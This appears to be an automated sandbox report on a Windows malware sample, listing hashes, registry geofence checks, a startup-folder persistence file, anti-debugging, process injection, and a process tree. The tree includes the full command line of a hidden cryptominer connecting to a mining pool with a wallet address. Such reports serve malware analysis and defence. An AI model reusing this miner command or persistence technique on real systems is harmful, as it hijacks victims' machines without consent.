Analysis
-
max time kernel
149s
-
max time network
106s
-
platform
windows10-2004_x64
-
resource
win10v2004-20240426-en
-
resource tags
arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
-
submitted
20-05-2024 15:54
Static task
static1
Behavioral task
behavioral1
Sample
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
-
Size
1.6MB
-
MD5
5feee9c9673462dfceb2df85cf8138b5
-
SHA1
18a97e4d1ba48aa7e935e4d0ebf415d7db859c1d
-
SHA256
c8fe094489bbbe929b676647dea128e9ef251d7babe7b6b67ee98d503eb33174
-
SHA512
9f1d6f0bf328fcc930d24dcc9c291b1ca13ef5d742fa0e0f622bfd6890c7da183ee35508e3f4a9b4ddfcbebdeb1e2960d49b00b6a14f28b8198b6e23e5baef1e
-
SSDEEP
49152:Al6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AlD9WuvtY7pHMD
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation (Process: 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe)
Key value queried: \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation (Process: WScript.exe)
-
Drops startup file 1 IoCs
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk (Process: 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe)
-
Executes dropped EXE 39 IoCs
pid Process 1716 csrs.exe 2016 csrs.exe 936 csrs.exe 2452 csrs.exe 4512 csrs.exe 1944 csrs.exe 1980 csrs.exe 1960 csrs.exe 4540 csrs.exe 1200 csrs.exe 2352 csrs.exe 552 csrs.exe 4316 csrs.exe 5104 csrs.exe 3024 csrs.exe 4448 csrs.exe 3428 csrs.exe 2028 csrs.exe 4528 csrs.exe 4600 csrs.exe 984 csrs.exe 2352 csrs.exe 2576 csrs.exe 424 csrs.exe 3828 csrs.exe 2792 csrs.exe 3412 csrs.exe 3008 csrs.exe 1796 csrs.exe 4560 csrs.exe 3288 csrs.exe 2252 csrs.exe 4684 csrs.exe 960 csrs.exe 3064 csrs.exe 2940 csrs.exe 3840 csrs.exe 932 csrs.exe 4676 csrs.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 39 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Key created: \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings (Process: 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"
Process tree depth: 1
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
Process tree depth: 2
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
Process tree depth: 3
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1716
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
1.4MB
MD5
e3427d9f439aebefa3d9c299e2a94af3
SHA1
ffff4672790378677ec30d3634fc593c10dfd37e
SHA256
7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba
SHA512
a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b
-
Filesize
1KB
MD5
f4b667fe8d75278dffe4fa57d5b7212c
SHA1
05bc96683ea77d081fedcd810c4de7e9c5bb833a
SHA256
4f1a7ce0e5031763d94e774ce4fbe096e9ad0058abb5d209988dbf375a5ec922
SHA512
52e2113bf234ea03c933d57030326e850847558ad7b195f74a99fa0d23e9857cb0e273a52a45602663462ee0bd9fee017e76e67b5a68c748e286b36d60ba6d41